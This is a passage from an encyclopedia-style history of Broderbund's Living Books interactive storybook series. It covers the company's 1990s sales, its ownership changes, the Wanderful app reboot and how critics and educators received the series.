bad products". Schon suggested that despite the children's software segment of the interactive multimedia industry growing by 18 percent in 1996, with total revenues near $500 million, there were too many publishers to share the target market, and too many products fighting for the "very limited shelf space". In the first two quarters of 1996, Broderbund's product line including the Living Books series amounted to 9 percent of the market share. That September, The Daily News asserted that the Living Books series was "currently not making money". Even more concerning for the company, "the rapid growth of the Internet presented a profound disruption of Living Books basic production model" as there was a growing belief that content on the internet should be free. The emergence of the World Wide Web had diverted investment capital and development talent from the CD-ROM industry and broken its hold on consumers. In 1996, Living Books explored partnerships with Internet companies such as Netscape, and proposed a Netscape/Living Books collaboration called Netpal. Schon expressed hesitance with exploring web-based titles as the narrow available bandwidth would have given children a "slow, dull experience"; he was also uncertain what the business model would be in this new market. By April 1997 a brand new release from Living Books could be purchased for as little as $19.95 with coupons. Publishers struggled to find the right price point that would entice parents while allowing them to break even. The Learning Company (formerly SoftKey) had a significant impact on the market. Throughout the 1990s they had a strategy of releasing shovelware discs of freeware or shareware at very low prices, purchasing edutainment companies through hostile takeovers and reducing them to skeleton staff, while retaining only a small development team to keep cranking out new products; by 1998 Broderbund was one of the few independent companies still standing. FundingUniverse explained, "with the elimination of elaborate packaging and hard-copy documentation, and the move to jewel-case formats with CD-sized booklets". The Learning Company (formerly SoftKey) CEO Kevin O'Leary pioneered a budget line of CD-ROM products in 1995, with the company's "Platinum" line titles carrying retail list prices of $12.99 instead of the mid-$30 range most of the premiere products carried." In a direct action against Broderbund, The Learning Company (formerly SoftKey) bought the company that made PrintMaster, a rival to Broderbund's best-seller The Print Shop, and sold it for $29.95 with a $30 refund which Broderbund couldn't compete with. This had a big effect on the company's stock price. Broderbund began to have a defensive strategy of preventing the remaining edutainment companies from being acquired by The Learning Company (formerly SoftKey), a factor that would lead them into re-acquiring Living Books. Return to Broderbund This climate affected the profit projections of Living Books. In 1996–7, Broderbund enlisted Jeff Charvat to work on the troubled series and making it work; Charvat "charg[ed] in with answers, rather than questions", a strategy Charvat later admitted "[wa]sn't the way to go". With mounting losses, Random House started trying to sell its shares and began negotiating with Broderbund. On January 17, 1997 it was reported that Broderbund and Random House had "reached preliminary agreement on key terms" to transition Random House's stake in the 50–50 joint venture to Broderbund in a buy back, though it would need to be approved by each company's Boards of Directors; Random House would continue to be a content partner for future Living Books products. Under the new arrangement, Random House would continue to sell Living Books via their bookstore channels, help Broderbund acquire content licences for future titles, while royalties would be determined on a case-by-case basis. At the time, Joe Durrett, Chief Executive Officer of Broderbund noted, "although Living Books remains a small portion of Broderbund's revenue, it shares our focus on children's education and will continue to play a central role in educational software development." Randi Benton, president of Random House New Media, felt that integrating Living Books into Broderbund would allow it to better take advantage of the company's sales and marketing. Random House was to receive an undisclosed amount of cash and Broderbund stock. The agreement was signed on January 20, 1997, and Broderbund hinted at a management reshuffle. At this point it was unsure whether Living Books would be folded into Broderbund or remain a separate entity. This was not uncommon at the time for book publishers to revise their multimedia strategies. Random House would also sell its minority stakes in Humongous Entertainment and Knowledge Adventure, while HarperColllins sold off both its adult and children's operations; meanwhile, Simon & Schuster "readjusted" by cutting staff and cancelling titles. Publishers Weekly attributed their market failure to bookstores, their traditional distribution channels, being hesitant to embrace new media, leading to the book publishers having to fight for shelf space in alternate outlets against established new media players. Random House ultimately sold its shares in Living Books back to Broderbund for $9.3 million (through a combination of cash and restricted stock with an aggregate purchase price of approximately $18,370,000). The Living Books excess purchase price was allocated to in-process technology and charged to Broderbund's operations account at the time of acquisition. As a result, the group became acquired as a wholly owned by Broderbund who subsequently folded the division. By April 1997, Living Books had reduced the number of titles it released per year, adopted a culture of parsimoniousness, and relied on its "high-quality back-list of classics" to "generate steady income". Schon anticipated a "shakeout". In October 1997, Living Books halted half its projects and underwent a staff restructuring of which more than half its workforce including Shon were laid off. The layoffs came after consecutive quarterly losses at Living Books. Broderbund's education line of products, which included Living Books, decreased approximately 8% in fiscal 1997 as compared to a 13% increase in fiscal 1996. Broderbund, which had purchased both Parsons Technology and Living Books over fiscal year 1997, saw its shares reduce by 9.8 percent after reporting a second-quarter multimillion-dollar loss. Channelweb commented that Broderbund had "burnt its fingers" with Living Books, which had "turned in a lacklustre performance". Broderbund explained Living Books' decline in unit sales and net revenues over fiscal 1996 and fiscal 1997 as "an increase in operating expenses reflecting higher marketing and development costs" and "pricing pressure". Decline (1997–2000) Later activities August 27, 1996 saw the company release an interactive website at www.livingbooks.com called Living Books' Corner of the Universe; Tortoise from "The Tortoise and the Hare" guided visitors through three planets: the Kids' Planet, the Grown-Ups' Planet and the Corporate Planet. Narrative Communications, Enliven streaming technology was used to allow demos to be played over the internet. In 1997, Broderbund bundled Living Books titles in groups of four and re-released them as Living Books Libraries and a competitive price point of $30. They contained "a special bilingual component that includes Spanish versions of selected student reproducible pages and a discussion of the special needs of second language learners", as well as a Living Books Alive video demonstrating the practicable application within the classroom. Broderbund also released two compilations of the stories under the line "Three for Me Library". The first volume contained Sheila Rae, the Brave, Just Grandma and Me, and Little Monster at School, while the second volume contained The Berenstain Bears Get in a Fight, Tortoise and the Hare, and Harry and the Haunted House. In 1997, Broderbund also re-issued Just Grandma and Me and Arthur's Birthday as Version 2.0 with increased resolution and additional minigames. Just Grandma and Me 2.0 also featured a Castilian Spanish dub as opposed to the Latin Spanish dub of the 1.0 release. Arthur's Computer Adventure was released on August 3, 1998 as the first in a "new evolution" of Living Books which "fully incorporate[d] storybook and activity center elements". By 1998, Broderbund had sold 10 million copies of this series worldwide and had achieved over 60 awards. That year, Living Books developed and published its last titles, which were based on the Arthur children's book series. In February 1998, Broderbund offered ICTV, provider of high-speed internet services and interactive multimedia content over cable television networks, selections from a suite of educational and entertainment interactive CD-ROM titles including Living Books. After two years of negotiation, in August 1998 Brazilian publisher Editora Delta secured a contract to translate the series of 18 books into Brazilian-Portuguese (as "Livros Vivos"); the company had previously been known as producer of the encyclopaedia "Koogan Houaiss" and the Mundo da Criança collection. Founded in 1930, Delta entered the multimedia industry in the 1990s with the importation of foreign CD-ROMS; product localisation was necessary for these titles to be successful, and as such Delta employed a translation process that adapted the content, localising references, lip syncing the mouths, and altering the story text and animation. This phase of the company was launched with the volumes of the "Livros Vivos" collection for the child consumer: "Só Vovó e Eu", "Ursinhos Brigões", "Aniversário do Artur" and "Stellaluna", worked on from 1994 to 1996. Delta secured Sítio do Pica-Pau Amarelo actress Zilka Sallaberry to narrate the stories. The CD for O Aniversário de Arthur (Arthur's Birthday) was released with the Spanish and English language options. In March 1999, Delta would announce the release of Stellaluna. By 2002, The Tortoise and the Hare was selling for $9.98 at Children's Software Online. The Learning Company et al. sale On August 31, 1998, Broderbund was bought in a hostile takeover by The Learning Company (formerly SoftKey), in a stock deal of $416 million, following many other child-focused companies that were absorbed throughout the decade. The company had been formerly known as SoftKey until it acquired The Learning Company in 1995 and took its name. Broderbund became the 14th Learning Co. acquisition since 1994, and secured the company 40% of the educational gaming market. The Learning Company (formerly SoftKey) was known for aggressively driving down the development costs of products and laying off employees of the companies it acquired. Broderbund's 1700 employees were reduced a year later to around 30. While the Broderbund brand lived on, the company was disbanded and the talent found new opportunities. Meanwhile, "the rights to Living Books [and other Broderbund brands] began to bounce from corporate owner to corporate owner. The Learning Company (formerly SoftKey) re-released some Living Books titles. In 1998, D.W. the Picky Eater was upgraded as Arthur's Adventures With D.W. with a new menu system. and additional games. Dr Seuss' ABC appeared in the collection Adventure Workshop: Preschool-1st Grade, and Tots. In 1998-9, Living Books launched the series into German. In 1999, The Learning Company (formerly SoftKey) released a reworked version of Arthur's Reading Race as Arthur's Reading Games (1997) under their Creative Wonders label, which brought the reading games to the forefront and moved the interactive story to a bonus feature. On May 13, 1999, The Learning Company (formerly SoftKey) themselves were bought by Mattel for $3.8 billion, a company with limited experience with developing software titles. The acquisition was part of CEO Jill Barad's strategy to expand Mattel into electronic toys and video games. The Learning Company and the Broderbund brand names were brought under the Mattel Interactive umbrella. In their 1999 Annual report, Mattel noted an "incomplete technology writeoff of $20.3 million related to products" being developed by Creative Wonders, Parsons Technology, and Living Books. In response to public complaints about privacy, Mattel Interactive announced that starting June 2000 they would provide a tool that removes Mattel software called Broadcast which was surreptitiously being placed inside Living Books and other programs to transmit and receive information to Mattel. Broadcast had been named after Broderbund, who had designed the original software as a marketing technique. However the software ended up discontinued in April when the federal Children's Online Privacy Protection Act went into effect. That same month, Mattel Interactive was put up for sale. Mattel ended up selling The Learning Company (formerly SoftKey) to acquisition and management company The Gores Group for a fraction of the price they had originally paid for them. Mattel's acquisition of The Learning Company (formerly SoftKey) has been referred to as "one of the worst acquisitions of all time" by several prominent business journals. After taking over The Learning Company (formerly SoftKey), Gores divided it into three groups one of which focused on educational software and included the Living Books brand name; Riverdeep purchased this group in September 2001. Through Riverdeep mergers and acquisitions, the rights "eventually landed with publisher Houghton Mifflin Harcourt". According to Schlichting, Broderbund's turbulent corporate history meant that "many great CD-ROM titles for kids were forgotten while technology and operating systems moved forward." Schlichting asserts that, "for years, former team members and fans wished there was a way" to resurrect the series and that "several of us looked into it". While the series had experienced a "decade of great success", Houghton Mifflin Harcourt would not release new Living Books stories, and the series "languished without updates to newer operating systems for PC and Macs". The series however was still well-remembered; for instance in 2007, The Open University of Israel wrote a journal article entitled Living Books: The Incidental Bonus of Playing with Multimedia, finding that "young children who did not know how to speak or read the English language became proficient in pronunciation and gained a high level of understanding by playing with Living Books". Wanderful reboot (2010–2012) Reboot conception After the CD-ROM market's decline in 1997, Schlichting left to oversee creative development for an early online children's network called JuniorNet. In 2000, he founded NoodleWorks Interactive, a creative company specializing in children's interactive design, development, and social networking; his first iPad app for children, Noodle Words – Actions, was released November 2011 and won numerous awards. In 2010 he presented at the Dust or Magic AppCamp as part of the "Panel of Legends"; he would continue to present at these conferences over several years. Meanwhile, Mantle left to work for Gracenote, a company which provided music information services to Apple. By 2010, Mantle had accumulated a series of ex-Broderbund staff at Mantle, and upon the announcement of the iPad, he felt it was the perfect platform to bring Living Books back. The animation, graphics, sound, and music would be unchanged, and only product platform would be different. Mantle identified that there were currently no products on the market that were designed for children with autism, which had been a key demographic of Living Books. He enlisted Axworthy as Senior Systems Architect to create a prototype using the series' existing assets which could run on the new technology. Meanwhile, he contacted Baker to help deduce who the Living Books CD-ROM asset rights belonged to and how best to license them. The pair worked out that the rights were owned by Houghton Mifflin Harcourt. By early 2011 a prototype was running. Mantle informed Schlichting that he was "getting the band back together", and Schlichting offered a list of "requirements and suggestions for enhancing the products" after reviewing the prototype. Schlichting was ultimately brought onto the project as Chief Creative Officer, as was Siegel who resumed his role. Ray was brought back to update the materials for classroom teachers that she developed initially for Living Books. Upon being asked to return, graphic technician Rob Bell was "thankful" that Mantle had the "resources and means and motivation" to do this project, which he saw as "bringing these products back to life". Mantle reached out to Houghton Mifflin Harcourt, and succeeded in acquiring the Living Books CD-ROM rights and assets from John Bartlett the VP, Licensing Consumer Products and Solutions, who used to work at The Learning Company and The Learning Company (formerly SoftKey) and knew the series. However, as Houghton Mifflin Harcourt had let the digital rights – to the children's books on which Living Books were based – lapse, Mantle would have to secure the digital publishing rights directly from each of the authors. After receiving a mix of enthusiasm and skepticism from ex-Broderbund founder and CEO Doug Carlston, he enlisted a team of ex-Broderbund staff to build the technology and data assets. Meanwhile, Mantle sought to secure the rights from the authors, a process that would prove to be "almost more effort than producing the updated products". The digital licenses for Dr. Seuss, some titles from The Berenstain Bears, and Little Critter were obtained by Oceanhouse Media, who owned all of the interactive storybook game rights and had created their own iOS titles. By late 2011, Mantle had successfully secured the exclusive rights to all the Living Books storybook assets from HMH and most of the author's publishing rights, and began active development. However, Houghton Mifflin Harcourt had allowed the Living Books content to be re-published so long as the Living Books name remained theirs. As Houghton Mifflin now owned the 'Living Books' brand, a new name was needed. The team decided to create a new monikor while including an attribution that the stories were “originally published as a Living Book by Broderbund Software” with the Living Books logo. After being presented with 30 potential names by Anthony Shore, Chief Operative of branding agency Operative Words at a preliminary screening, Wanderful Interactive Storybooks was chosen. The new name is related to "wonderful" and "wandering", with the games "about being inside storybooks, exploring, and the magic of it all". Wanderful describes the books' "full[ness] of joy", the "invitation to explore" the "free-form play" from their "expansive and non-linear interactivity", and their "whimsy and curiosity, delight and enrichment". Wanderful's aim was to "reinvent and reintroduce the Living Books titles for young and emerging readers (and their families) everywhere". Reboot development The team had a significant hurdle to overcome in the next stage of development. While they had secured the Houghton Mifflin Harcourt rights to Living Books, the assets were not readily available. Broderbund's documentation, scripts, source code, and product assets (graphics, animations, sound, and music files) had been saved onto a set of CD-ROMs and placed in the company's product archives. However, Broderbund's turbulent company history at the turn of the millennium led to much of this archive being lost. Therefore, Wanderful hired original Broderbund programmers to re-create modules from scratch. Meanwhile, master archives of assets were created by acquiring customer copies of original Living Books products to extract the files from the CD-ROMs. Axworthy identified not having the source code as the biggest challenge. Once the assets were retrieved, the titles still required significant modifications in order to optimise their "interaction and responsiveness"; this involved reprogramming how user interactions would be interpreted as actions. As a result, page introductions and animated sequences were able to be interruptible, which was key to making the product work on tablets. Wanderful added settings to allow the parent or teacher to "modify the interactivity to customize the mode of operation" to be appropriate for the child, being able to choose between an 'interruptible' mode (where clicking triggers an action – useful for word recognition) and a 'patience mode' (where players must wait for the current action to complete – useful for ADD children) to suit different child learning styles. Interruptible mode offered language exploration opportunities by allowing children to play with the beginning sounds of each word in a "rapid fire"; e.g. "Baa-baa-baa-baby". This new option benefited users through self-paced interaction and repetition, and the "ability to click a particular word 30 times in a row is like having an infinitely patient, ever-available teacher or parent". Meanwhile, no changes were made to the user interface or appearance. The upgrade was made more complex through the addition of a page navigation and language selection system, as well as synchronising the interruptible 2D animations with the audio sounds and music. Additionally, the animations and sounds had to be interruptible and able to be repeat rapidly if the user chose to frenetically interact with the system. All this complexity and the many components that implement these capabilities are rolled up into the User Interactivity and Action Interpreter boxes. The team managed the display of ancillary assets in HTML/JavaScript, while the graphics and layout was done using CSS templates this process added many months of effort to the schedule. This technology suited a "blended learning environment", combining "both face-to-face and distance learning". The titles were presented through a dynamic language function that allows readers to switch languages whenever they want. Titles came with two languages (either US English and Spanish, or UK English and French, that the user could toggle through), and offered in-app purchases for additional languages. Wonderful announced in they 2012 that upcoming versions of the interactive storybooks would also be available in Japanese, German, Italian, U.K. English and Brazilian Portuguese. Touching the upper right and left blue triangles reveals pop-up page navigation thumbnails, and pop-up language selection buttons respectively. There was also an option to show where the hotspots are. The titles included interactive features for multi-touch devices and refreshed art work for higher-resolution displays than was available at their original release. Players could buy the right to perpetual updates for $7.99. Deluxe versions of the titles were made available for teachers with bonus features including the 30 page curriculum plan Teacher's Guides originally made for classrooms. Ray opted not to alter these much from the originals, which had been carefully constructed by a team of professionals, though the guides were cognisant of the current USA Common Core State Standards. These educator-focused Classroom Activities Guide were available for $2.99 as an in-app purchase, and tied each storybook to reading, arts, math, social studies and other subjects inspired by the narrative and adhering to Common Core State Standards. They also included printable pages of puppets, activity sheets, and images from the stories. Additional content was added in-game; for example Arthur's Teacher Trouble, a story focused around a 3rd grade Spelling Bee, was supplemented by three pages of interactive 3rd grade spelling words. Reboot release and current era Seven of the updated and enhanced storybooks were released on iOS throughout 2012, while Android and Mac OS versions were added from 2013. Wanderful's first four titles, released through 2012 at a price point of $4.99, were Arthur's Teacher Troubles (originally 1992), Little Monsters at School (originally 1993), The Tortoise and the Hare (originally 1993), and Harry and the Haunted House (originally 1994). Harry and the Haunted House was released in October to coincide with Halloween. November 2012 saw The Berenstain Bears Get in a Fight released as the fifth title (originally 1995). The New Kid on the Block was released October 29, 2013 as the ninth. The Mac version was released on April 11, 2013. Shlichting noted, "You're looking at a few dollars profit for an app instead of $30 for a CD game, and users expect more than they used to. To be a sustainable company, you have a higher bar for sales and quality." Living Books Samplers, standalone CD-ROMs which had been given away with the original Living Books for free in magazines or as built-in catalogs with the programs, were compiled and released as the Living Books Sampler free app with an interactive one-page sample of each title, and was updated as more storybook were re-released; Living Books Sampler was released on December 13, 2012 on iOS and April 25, 2013 for Mac OS X. The app is "hosted" by Simon, the narrator from Wanderful's classic version of the Aesop's fable Tortoise and the Hare. The app also includes Wanderful's Classroom Activities Overview and a Classroom Activities Preview for one of the storybooks, both as PDF documents. Living Books Sampler contained over 250 interactive elements. Little Ark Interactive became a wholly owned subsidiary of Wanderful. Two titles from the affiliate were re-released in March 2014. The third, Noah's Ark, was released in 2016. They aimed to continue releasing titles under this banner " to help children discover a lasting love of language through story exploration and learn important lessons from the Bible." At the ISTE (International Society for Technology & Education) 2014 conference, Software MacKiev and Wanderful Interactive Storybooks announced the availability of Stellaluna for iPad/iPhone/iPod Touch and Mac OSX computers. Software MacKiev would release the iOS versions of four storybooks: Dr Seuss' ABC, Green Eggs and Ham, Stellaluna, and The Cat in the Hat, though Wanderful's Dr. Seuss titles would be removed from the App Store to prevent confusion over the similarly titled Oceanhouse Media apps. Oceanhouse Media would become the largest interactive books publisher on Amazon Fire TV by 2018, and had 62 titles including versions of the same titles that Living Books had adapted. In March 2016, Schon donated to The Strong museum hundreds of materials that document the Living Books' history, including games and company records from between 1993 and 2000. Wanderful currently has 9 employees and has generated $1 million in sales. In 2020, Wanderful announced that their Classroom Activities Guides would be offered for free with their storybook apps to assist families during COVID-19 isolation. To date, the first Living Books title Just Grandma and Me has sold over 4 million copies in seven languages, while Harry and the Haunted House has sold over 300,000 copies in six languages. The Living Books series as a whole went on to sell tens of millions of copies in multiple languages. Living Books titles are currently available through Wanderful Interactive Storybooks' series of app re-releases on iOS. The Living Books rights are currently licensed from Houghton Mifflin Harcourt. Legacy Contemporary opinions In August 1992, Kiplinger's Personal Finance wrote of the series, "there's not much demand for computer CD's yet, but I like that fact that Broderbund looks ahead". That month, Computer Gaming World wrote, the "notion of matching children's books to CD technology is nothing short of inspired" though noted the disk-access and data transfer limitations of CD-ROMs; nevertheless the magazine anticipated the series would "probably go down in history as the Carmen Sandiego of the talking book genre". Upon release, Wired wrote that Just Grandma and Me is the "closest thing to an instant classic' in the relatively new arena of children's CD-ROMs". Critics raved about it. Newsweek suggested that Schtiling could "end up serving as the Dr. Seuss of the digital age", as he had an "ear — and respect — for the tastes of kids". According to Publishers Weekly, the Living Books company was formed in 1994 "amid a great deal of fanfare". For Michael J. Himowitz at Tampa Bay Times, the series brought back the "old 'Gee whiz" reaction that he had lost over his decade spent playing and reviewing computer games. Compute! asserted in 1993 that the introduction of the Living Books series saw Broderbund "adding yet more extraordinary titles to an already superior product line". The New York Times felt the "post-modern" series "turns traditional beginning-to-end narrative on its head". Compute! wrote that users would be "enthralled by this new style of storytelling". Newsweek thought that Living Books demonstrated Broderbund was "one of the first companies to experiment with CD-ROMs". The Age felt the series "gave children's stories a whole new life", and "caused both teachers and parents to reflect on the value of such a format for books"; it felt that the series continued output and sales was testament to the view that the majority of customers believe they have something to offer to young readers.Compute! wrote that Living Books "demonstrates the power of multimedia computing" through this "perfect babysitter", ultimately praised Broderbund's "virtuoso performance" in "taking the lead in advancing the state of the art of educational multimedia software". Newsweek dubbed Schlichting as the "reigning muse in the business of converting children's lit into interactive CD-ROM discs [that] kids squeal over". At Disney, Living Books were considered "exemplars of how best to create engaging, enriching, digital story experiences for children". The Washington Post deemed it "the best of the book-bound-read-along genre ". Just Grandma and Me, the first in the series, was deemed by The New York Times as the "standard-bearer of the Living Books line", which they described as a "kind of multimedia industry gold standard". Compute! wrote "These Living Books delight at so many levels they'll make you want to buy a CD-ROM player if you don't already have one for your home computer". Computer Gaming World wrote that Living Books' quality is "unmatched" and comes with the highest recommendation, and felt the "acclaimed series" should be "at the very top of any parent's list". In 1995, St Louis Post-Dispatch wrote, "almost any kid with a home computer and a CD-ROM has heard of Living Books". Anne L. Tucker of CD-ROM Today revealed "I'm addicted to Living Books", and wished all her favourite childhood stories could be adaption by the series. PC Magazine wrote that Arthur's Teacher Trouble as well as Just Grandma and Me are "among the best-ever CD-ROMs".Emergency Librarian wrote the series upheld the high standards of Broderbund. TES thought the series owned the interactive storybook genre. In 1996, The Educational Technology Handbook wrote that Living Books was "running away with awards". Inside Education thought the series was "setting a standard for excellence in the children's software industry". By 1997 there were at least eight manufacturers of CD-ROM interactive storybooks. Salon described Living Books as "one of the hot companies of the early-'90s electronic publishing boom". The Seattle Times asserted that Living Books "popularized the animated storybook format". Strategy+Business deemed the series part of Broderbund's "string of winners" including Print Shop, Where in the World Is Carmen Sandiego?, Kid Pix and Myst. In 1999, Interaktive Geschichten für Kinder und Jugendliche auf CD-ROM noted Broderbund was "one of the first companies to convert books into multimedia form". Schlichting's child-informed design is a technique which by 1999 would become ubiquitous in both the industry and academia almost a decade after its use by Living Books. Living Books were the first to use both "read to me" and "let me play" modes, as well as speech-driven highlighting; both techniques have since been widely adapted in children's language app design. Children's Tech Review featured an interview with Schlichting in their March/April 1999 issue entitled A Conversation with Mark Schlichting: The Guy Who Thought Up the Living Books; in it the newspaper opined, "if someone asked you to name the best children's software ever made, Living Books would surely make the list". Massenmedium Computer reflected in 1999 that the 'virtual pop-ups' received "surprisingly good" reviews despite Living Books' short history and the series' "artistically unappealing design". Modern opinions Living Books pre-empted the popularity of the industry; by 1995 the CD-ROM market had "exploded". Museum of Play wrote that Living Books was the "leader in this effort to upgrade juvenile literature for the digital age". Interactive stories for children and teenagers on CD-ROM agreed it was "one of the first companies to translate books into multimedia". Gamasutra designated it "the oldest CD ROM series for kids". Living Books became popular and encouraged other developers to follow suit and copy the formula. While teachers had already been buying copies of the game for their classrooms for years, the series would become one of the first pieces of software to be accredited as a 'textbook' in several states. However, when the program was first released in schools it had a "very mixed reception" Multiple Perspectives on Difficulties in Learning Literacy and Numeracy noted that teachers observed children crowding around the screen to play and screaming with laughter when triggering animations, and that children agreed they were not paying attention to the text. The series won many awards and its creators received letters from children and parents. People became so enamoured by Living Books that the book authors were asked to autograph the CD-ROMs. Apple Inc.'s John Sculley even used the titles in product demonstrations. It was seen as the "multimedia de facto standard" by Microsoft, and was shown nationally and internationally by Bill Gates. The Huffington Post deemed the series the first example of ebooks, and the precursor to the eReader-tablet pairing that popularised digital reading. Children's Tech Reviews agreed that Living Books pre-empted ebooks by 15 years, deeming them "children's e-books". Living Books has frequently been used in research papers regarding child learning. In the years after the sale of Broderbund, Schlichting struggled to reach the levels of fame of his series as his name didn't appear on the products themselves. However, n 2012, Schlichting was awarded the Kids at Play Interactive "KAPi" Award for 'Legend Pioneer' at the Consumer Electronics Show due to "inspiring a generation of younger designers" through Living Books and Noodle Words; the jurors commented, "it's about time this guy is recognized for his contribution to the field."Hyper Nexus noted that Living Books' reputation of ease and functionality led to consumers testing other Broderbund programs and the company achieving a strong market domination, a phenomenon they had earlier observed with 1984's The Print Shop. In 2007, a presentation at the 12th Human-Computer Interaction International Conference asserted that there is a "cult that involves millions of 'Living Books Freaks', who use the titles for hours every day, both in groups and alone". French site Week-ends.be asserted that Living Books were "'masters-choices"' that are "unanimously appreciated by children." Jon-Paul C. Dyson, director of The Strong's International Center for the History of Electronic Games, said "Living Books was an innovator in the creation of interactive books and became a leader in the development of educational and entertaining software for young children". In his paper Multimedia Story-telling, Yoram Eshet deemed Living Books "one of the most powerful and widespread expressions of multimedia educational environments", and asserted that interactive storybooks are "one of the most common edutainment genres". According to Computer Gaming World, the Wanderful project addresses the "challenge of overcoming so-called software rot" in which computer programs become incompatible with modern hardware as contemporary systems become discontinued and upgraded. Igotoffer wrote the series "perfected the art of creating kids’ storybooks on CD-ROM". Storybench described Schlichting as one of the forefathers of edutainment due to his work on Living Books. Dust Or Magic, Creative Work in the Digital Age thought Living Books was the sole exception in the CD-ROM publishing 'shovel-ware era'. Dust or Magic, a digital design-sharing platform inspired by the book and produced by produced by Children's Technology Review asserts that the early success of Club Penguin, Pokemon, Minecraft or Living Books "can be tied in part to their clever use of animation and humor, which aren't used randomly or without purpose"; it writes that Living Books "went on to become a standard-bearer of quality, loved by children, parents and teachers alike for their emphasis on good stories and entertaining exploration". Teachers With Apps wrote, "many in the industry to be the benchmark for engaging educational multimedia". Creator opinions Schlchting acknowledges that Living Books became a household name, but "only after a struggle". According to him, Living Books became the industry's first truly interactive storybooks and "defined the category". Schlichting asserts that the series' lack of install and its automatic play feature was revolutionary for the time. He noted that the "attract mode" was so popular that parents would write in to say that their kids had learnt all the moves and would dance along. Schlichting later learnt that his direct address technique was one of the methodologies of Montessori education, though he had added it because "it seemed right". Schlichting discovered that children with autistic or with special needs felt that their decisions "'made' the animation happen", and that they were able to map this feeling of control onto the real world. Schlichting's ex-coworker Jesse Scholl opined that he "knew so much about how children think and what they cared about". Mickey W. Mantle, president and CEO, Wanderful reflected ""Living Books has such an amazing legacy, remembered by children, trusted by parents and embraced by the educational community" through "elegant, interactive-rich...production values". Over the years, Schlichting has had many people tell him that they learned English from Living Books. George Consagra, executive producer of Ruff's Bone, thought Living Books were "pioneers in the art of interactive storytelling". Prior to his work on Ruff's Bone, Noyes had been inspired by Just Grandma and Me, subsequently seeing CD-ROMs as the "perfect modern-day medium" for his children's projects. Angie Simas, who ran Broderbund's first website, came to the company as an interim job while seeking a teaching position, though after observing Living Books two weeks in she was inspired to change her career to the computing industry. Axworthy recalling his daughter not knowing about his software career, and one day gushing about a product she used at school, Sheila Rae, the Brave about two sisters who learn to love and depend on each other, not knowing it was worked on by her father. He recalled Schlichting as being difficult to work with, but appreciated the impact he had on children's lives. Mantle noted that Living Books were "pioneering apps on Macs of a generation ago over" and that over the years they'd "had many requests from Mac-using teachers and parents" to revive the programs. so he was "excited to make these great story experiences again available for the Mac". He said the project came "full circle"." In 2014, he noted "Wanderful Apps have been long been favorites of special needs children in the autistic community." Relationship to other series Broderbund's Living Books series was perhaps the first example of popular children's stories in print being adapted into digital storybooks that encouraged interactive learning and play in the computer, or at least popularized the animated storybook format through hits such as 1993's Just Grandma and Me and Arthur's Teacher Trouble which were based on popular children's books from the 1980s by Mercer Mayer and Marc Brown respectively. The Seattle Times asserted that the Living Books encouraged other developers to follow suit. Disney copied the formula through Disney Animated Storybook, whose interactive screens imitated Living Books' interactive pages. Both companies combined the authors' illustrations and stories with digital activities and were guided by a narrator—each screen began with a brief animation followed by a narrator describing the action; after the conclusion of each page, the scene became an "interactive mural with hot buttons" the player could click. Project LITT: Literacy Instruction Through Technology found that Living Books had high text interactivity and minimal extraneous games and activities, while Disney's Animated Storybook had medium text interactivity and embedded games and activities. New Media notes that "nothing sells like a character" that has already been proven in media, noting this strategy used by Disney creating spin-offs of its film and TV projects, and Living Books applying this to a lesser extent with popular books. Compute! suggested that the only negative to the series is its "hardware expectations" though noted it would "encourage people to upgrade their machines". Computer Shopper negatively compared activities in Living Book titles to those in Disney's Animated Storybook. Meanwhile, the Los Angeles Times criticized Disney for contracting their games to independent studios like Media Station, deeming the series "a mere imitation of Broderbund's Living Books format". The study Talking Storybook Programs for Students with Learning Disabilities found that "Living Books programs appeared more comprehensible to students than the Disney programs". MacUser felt Slater & Charlie Go Camping by Sierra On-Line was a "pale imitation" of the Living Books series, while PC Mag thought it wasn't "quite as richly animated" as Living Books. Additionally, MacUser wrote that series like Living Books and Discis' Kids Can Read "operate on two levels" by letting players follow the story narrative and by exploring the story's contents. Meanwhile, the De-Jean, Miller and Olson (1995) study found that children preferred Living Books over Discis as the latter "could not be played with". The Seattle Times compared Living Books' hunt for surprises with Electronic Arts' Fatty Bear's Birthday Surprise and Putt-Putt Goes to the Moon. Bloomberg positively compared the series to interactive storybooks from Packard Bell Electronics subsidiary Active Imagination, deemed the latter "not quite as rich". Children's Technology Review thought TabTale's 2011 app The Ugly Duckling imitated the Living Books style. Complex asserts that Reading Blaster and Science Blaster never received the same amount of attention as Math Blaster! due to "failing to live up to competition from the likes of the Living Books series", and wrote that Living Books could "hold a candle" as a Carmen Sandiego contemporary. Game Developer Magazine grouped together Living Books and Big Tuna Productions titles into The Living Book Series, though noted the latter was a pale imitation of the former. Critical reception As a learning tool Many reviewers praised the series as a learning tool. Multiple Perspectives on Difficulties in Learning Literacy and Numeracy felt the series offers children a narrative context to explore while giving them authority and control over the interface to motivate them to learn. The New York Times described it as "a reading lesson dressed up as an interactive cartoon". Compute! felt that the interaction led players to a "cartoon fantasy...wonderful, witty world of zaniness" that was both fun and educational. Children's Interactions And Learning Outcomes With Interactive Talking Books deemed the series "very much 'edutainment’". Folha appreciated that the games did not present the player with puzzles to solve. Multiple Perspectives on Difficulties in Learning Literacy and Numeracy asserts that the software had been "cleverly crafted" so that play could not commence until after the page had been read with each word highlighted, offering a narrative context for the children. The Educational Technology Handbook praised the series' 'whole language' approach. According to Technology & Learning, Living Books has the "ever-present message that reading is joyful, important and empowering". Tampa Bay Times wrote that they "respect their audience's intelligence". The Baltimore Sun felt the series was " educational and entertaining". The Guardian felt the series was " well suited for Years 1 and 2, and provide stories with patterned and predictable structures." The Children's Trust wrote that the series improves short-term memory, attention and organisational skills, independence and accuracy, language development, decision-making and problem-solving, and visual scanning. The Exceptional Parent recommended the series for parents wanting to "develop [their] child's interest in words and reading". Village Reading Center's Susan Rapp said Arthur's Reading Race was an "enjoyable first learning tool". PC Mag highlighted that the series was known for the messages they teach children, be it "the rewards of sharing" or "learn[ing] to separate fantasy from fact". According to Multiple Perspectives on Difficulties in Learning Literacy and Numeracy, the programs were "designed by cognitive scientists who knew about the psychology of both learning and play". The Age felt that the activities presented in the Framework kit were "quite structured" and "would be welcomed by teachers just starting out". Dan Keating of the Logansport Pharos-Tribune wrote the series was "interactive, entertaining and educational" and that the product line "pleased [him] every time. ACTTive Technology suggests, "a child teaches himself to read a book like Just Grandma and Me independently and with the help ONLY of the computer". The series had been highlighted for its incidental learning. One 2004 study in which Grade 1 and 2 Spanish/Hebrew speaking immigrant children playing the English version for 2 months, recognised and pronounced 70% of the story's words, suggesting that the game offered a "massive and effort-free 'incidental learning'" experience. The children reached a high level of proficiency in understanding and pronouncing of 